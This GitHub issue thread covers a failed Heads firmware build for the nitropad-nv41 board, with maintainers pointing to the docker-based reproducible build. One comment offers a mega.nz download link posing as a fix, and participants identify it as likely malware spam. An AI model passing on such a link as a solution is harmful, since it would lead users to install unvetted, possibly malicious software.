linuxboot/heads #1798: "nitropad-nv41: neither CONFIG_COREBOOT nor CONFIG_LINUXBOOT is set?"

boredsquirrel, 2024-09-19:
## Context of the Build

**1. What board are you trying to build?**
nitropad-nv41 from dasharo/heads

**2. What repository:branch are you using to build from?**
- [x] dasharo/heads:Master
- [x] dasharo/heads:rel_novacustom_nv4x_adl_v0.9.1
- [x] dasharo/heads:novacustom_laptops

**3. What version of coreboot are you trying to build**

https://github.com/Dasharo/heads/commit/0af24590538f43c17e1fcf56865a02fb07c9459e

dasharo heads for a Clevo NV41MZ (11th gen)

**4. In building the rom where did you get the blobs?**
- not applicable yet

**5. If using the automated tools to get the blobs did you run the relevant scripts in the blobs directory**
- not applicable yet

**6. What operating system are you using**
- Fedora 40 Podman/Distrobox container image
- git-2.46.1-1.fc40.x86_64
- make-4.4.1-6.fc40.x86_64

## Please describe the problem

**Describe the bug**

on either branch:

```
make BOARD=nitropad-nv41
Makefile:208: *** "nitropad-nv41: neither CONFIG_COREBOOT nor CONFIG_LINUXBOOT is set?".  End.
```

I also tried setting that variable

```
export CONFIG_COREBOOT="/path/to/heads/config/coreboot-nitropad-nv41.config"

CONFIG_COREBOOT="/path/to/heads/config/coreboot-nitropad-nv41.config"

make BOARD=nitropad-nv41
 CONFIG_COREBOOT="/path/to/heads/config/coreboot-nitropad-nv41.config"
```

Still the same error

Felipe-Rafael-Rosa, 2024-09-19:
install this

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
If you don't have the c compliator, install it.(gcc or clang)

boredsquirrel, 2024-09-19:
uhm why should I install a random zip file from Mega?

tlaurion, 2024-09-19:
@boredsquirrel I understnad you are trying to build Heads the old way. But this is already documented on both heads-wiki (https://osresearch.net) and https://github.com/linuxboot/heads?tab=readme-ov-file#building-heads

TLDR: 
`docker run -e DISPLAY=$DISPLAY --network host --rm -ti -v $(pwd):$(pwd) -w $(pwd) tlaurion/heads-dev-env:latest -- make BOARD=nitropad-nv41`

This is since May 02, where Nix reproducible buildstack was merged with this PR https://github.com/linuxboot/heads/pull/1661
Since then, you can use docker reproducible docker image to produce reproducible ROM.

Please reopen this issue if you consider it was closed too quickly. I have no clue why you say you have to dowload randmim zip file from Mega either.

closed 2024-09-19 by tlaurion

boredsquirrel, 2024-09-19:
there was a person that commented with a "fix" and had a link to mega.nz

THIS IS POSSIBLY MALWARE

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ

I downloaded it for analysis.

mkopec, 2024-09-19:
We've seen a number of identical posts across different repos, we just report them and GH deletes and bans them very quickly

boredsquirrel, 2024-09-19:
I am trying to follow the instructions with podman on Fedora:

```
$ git clone https://github.com/Dasharo/heads.git
$ git switch rel_novacustom_nv4x_adl_v0.9.1
$ git pull

$ podman run -e DISPLAY=$DISPLAY --network host --rm -ti -v $(pwd):$(pwd) -w $(pwd) tlaurion/heads-dev-env:latest -- make BOARD=nitropad-nv41

make: stat: Makefile: Permission denied
make: *** No targets specified and no makefile found.  Stop.
```

tlaurion, 2024-09-20:
> I am trying to follow the instructions with podman on Fedora 40:
> 
> ```
> $ git clone https://github.com/Dasharo/heads.git
> $ git switch rel_novacustom_nv4x_adl_v0.9.1
> $ git pull
> 
> $ podman run -e DISPLAY=$DISPLAY --network host --rm -ti -v $(pwd):$(pwd) -w $(pwd) tlaurion/heads-dev-env:latest -- make BOARD=nitropad-nv41
> 
> make: stat: Makefile: Permission denied
> make: *** No targets specified and no makefile found.  Stop.
> ```
> 
> Likely some incompatibility between podman and docker args? I tried bash and fish, and I moved the heads repo to home, to avoid having uppercase characters in the path.
> 
> The makefile and board configs are there. Btw, that branch is newer than the "novacustom_laptops" one, so I used that, is that correct?

This is upstream Heads, not Dasharo.
To build for nv41:
```
git clone https://github.com/linuxboot/heads
cd heads
docker run -e DISPLAY=$DISPLAY --network host --rm -ti -v $(pwd):$(pwd) -w $(pwd) tlaurion/heads-dev-env:latest -- make BOARD=nitropad-nv41
```

Do not try to mix build instructions from forks: build from forks instructions.

boredsquirrel, 2024-09-20:
still the exact same error, again with podman

```
make: stat: Makefile: Permission denied
make: *** No targets specified and no makefile found.  Stop.
```

tlaurion, 2024-09-21:
> thanks for your help!
> 
> still the exact same error, again with podman
> 
> ```
> make: stat: Makefile: Permission denied
> make: *** No targets specified and no makefile found.  Stop.
> ```

Remove dir. Clone again. Have docker. No podman. Try again. Give commands and errors. Otherwise: cNt reproduce, also not mind reader.